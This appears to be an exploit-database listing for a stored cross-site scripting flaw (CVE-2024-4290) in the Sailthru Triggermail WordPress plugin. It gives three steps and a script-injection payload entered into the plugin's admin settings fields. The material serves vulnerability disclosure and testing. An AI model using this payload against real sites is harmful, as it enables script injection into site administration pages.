Exploit for Sailthru Triggermail <= 1.1 - Admin+ Stored XSS CVE-2024-4290

Name: Exploit for Sailthru Triggermail <= 1.1 - Admin+ Stored XSS CVE-2024-4290
Rating: 5 (52 reviews)

2024-04-30 | CVSS 7.8

## https://sploitus.com/exploit?id=WPEX-ID:A9A10D0F-D8F2-4F3E-92BF-94FC08416D87
1. Go to https://example.com/wp-admin/options-general.php?page=sailthru&action=options
2. Enter the payload `"><script>alert(2)</script>` for any of the inputs
3. Save and see the XSS